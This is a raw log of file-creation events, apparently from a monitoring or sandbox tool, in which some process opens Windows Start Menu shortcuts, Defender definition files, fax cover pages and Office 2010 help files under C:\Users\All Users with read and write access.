Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Information.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Task Scheduler.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer Reports.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\ShapeCollector.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\TabTip.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Windows Journal.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\About Java.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Check For Updates.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Configure Java.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Create Recovery Disc.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Remote Assistance.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Media Center.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Access 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Excel 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft InfoPath Designer 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft InfoPath Filler 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\Digital Certificate for VBA Projects.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\Microsoft Clip Organizer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\Microsoft Office 2010 Language Preferences.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\Microsoft Office 2010 Upload Center.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\Microsoft Office Picture Manager.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\Microsoft Project Server 2010 Accounts.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft OneNote 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Outlook 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft PowerPoint 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Project 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Publisher 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft SharePoint Workspace 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Visio 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Word 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\SharePoint\Microsoft SharePoint Workspace 2010.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Windows Update.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpengine.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\MpSfc.bin	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\History.Log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\Hx.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.EXCEL.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.EXCEL.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.GRAPH.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.GROOVE.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.INFOPATH.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.INFOPATHEDITOR.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.MSACCESS.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.MSACCESS.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.MSOUC.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.MSPUB.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.MSPUB.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.MSTORE.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.OIS.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.ONENOTE.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.OUTLOOK.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.OUTLOOK.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.POWERPNT.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.POWERPNT.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.SETLANG.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.VISIO.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.VISIO.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.VISIO.SHAPESHEET.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.VISIO_PRM.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.VISIO_STD.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.WINPROJ.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.WINPROJ.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft Help\MS.WINWORD.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
